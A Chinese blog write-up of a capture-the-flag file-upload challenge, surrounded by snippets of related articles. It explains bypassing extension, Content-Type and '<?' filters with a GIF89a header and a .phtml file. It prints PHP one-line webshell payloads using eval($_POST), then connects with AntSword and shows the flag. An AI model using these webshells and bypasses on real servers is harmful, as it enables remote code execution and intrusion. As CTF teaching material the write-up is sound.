[极客大挑战 2019]Upload1(详解)

最新推荐文章于 2024-02-20 20:57:51 发布
最新推荐文章于 2024-02-20 20:57:51 发布
阅读量510 收藏 11
点赞数 9
文章标签: android web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77451464/article/details/136017979
版权

目录

打开页面,猜测可能是文件上传,然后慢慢尝试

先上传一个一句话木马文件

抓个包​编辑

发送到repeter

​编辑

然后发现出现不是图片的原因是因为Content-Type是文本类型,所以改成图片的类型

php被过滤了,不能是php文件,那么把后缀名改成或者php5、txt、phtml试一下(优先尝试phtml)

说明

完成上传

把文件名后缀改成phtml

再添加到蚁剑上

根目录下找到flag

找到答案

打开页面,猜测可能是文件上传,然后慢慢尝试

先上传一个一句话木马文件

文件名demo.php

说不是文件

抓个包

发送到repeter

然后发现出现不是图片的原因是因为Content-Type是文本类型,所以改成图片的类型

php被过滤了,不能是php文件,那么把后缀名改成或者php5、txt、phtml试一下(优先尝试phtml)

说明<?被过滤了

需要绕过他

<script language="php">@eval($_POST["cmd"]);</script>

由此可知,图片是有一个图片头的,可以用010editer打开看一下

图片头为GIF89a

完成上传

接着访问一下

<script language="php">@eval($_POST["cmd"]);</script>

这句话是不应该出现的,可能是文件名后缀不对,放在蚁剑上,发现不能打开

把文件名后缀改成phtml

发现正确

再添加到蚁剑上

根目录下找到flag

找到答案

flag{7a3e410d-5abb-4cf0-a0c6-2a48179519ea}

Fly_hao.belief
关注
  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
极客学院 idea教程 含2017.1版本 PDF及两个视频
11-16
极客学院 idea教程 含最新的2017.1版本 PDF及两个视频
BUUCTF [极客挑战 2019]Upload
m0_49025459的博客
05-12 4700
这题目是文件上传漏洞 看到这种上传的漏洞,肯定就是上传一句话木马,我们写一个正常的一句话木马先上传试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上传之后,提示我们不是image格式,那么我们上传的时候就抓一下包,修改一下上传的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
Buuctf<极客挑战2019upload
m0_64444909的博客
04-07 5148
文章目录一.划重点的知识点二.解题步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
[极客挑战2019]upload
最新发布
I_WORM的博客
02-20 434
这里进行了多次尝试,发现php、php3、php5等都被过滤了,phtml可以通过,php空格也可以,php.也能通过;</script>替换了;测试后发现只有后缀为phtml的文件可以解析php内容,html、php 和php.都不能正常解析;犯蠢的点儿:利用html、php空格和php.不解析<script language="php">代码就盲目认为是代码格式的问题;导致后面脑子就崩了;看了3.php才发现Asp_tags是关闭的;文件路径是没有给的,直接尝试访问upload文件夹发现是存在的;
[极客挑战 2019]Upload
siu~
09-07 868
[极客挑战 2019]Upload 解题
(文件上传upload) [极客挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1
一醉一休的博客
02-23 8535
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致用户可以越过其本身权限向服务器上传可执行的动态脚本文件。 一、[极客挑战 2019]Upload1 ...
极客挑战2019Upload解题
Bird&Bird
10-26 3488
1、打开BUUCTF在线评测,选择web---->【极客挑战2019Upload。 2、首先上一句话木马。 报错了,说明进行了前端过滤非图片格式文件。 3、 将文件后缀名改为.jpg后在上传。 报错,说明进行了后端过滤,文件内容不能包含'<?'。 4、修改文件内容,然后上传。 继续报错 应该是对图片头进行了校验,那添加图片头,然后上传。 终于上传成功了,但此时我们上传的是一个.jpg图片,利用不了。 5、通过bp抓包,并修改图片后...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
极客与团队-极客与团队1
08-03
前言“工程问题都很简单。人际关系才是最难的。——比尔·库格伦,前Google工程部资深副总裁生活中总是充满了离奇的转折,就好像我们俩从没想过会合作写一本软件工程
【BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1005
Upload=> 文件上传漏洞。
BUUCTF——[极客挑战2019]Upload-1
weixin_62248541的博客
11-25 410
BUUCTF-[极客挑战2019]Upload-1
文件上传 [极客挑战 2019]Upload 1
m0_75178803的博客
10-11 778
上传失败了,应该是在后端也对我们的文件内容进行了检测,检测到我们的一句话木马里面包含
BUUCTF——[极客挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 814
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
极客挑战2019-upload
m0_73303597的博客
12-11 325
自用
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值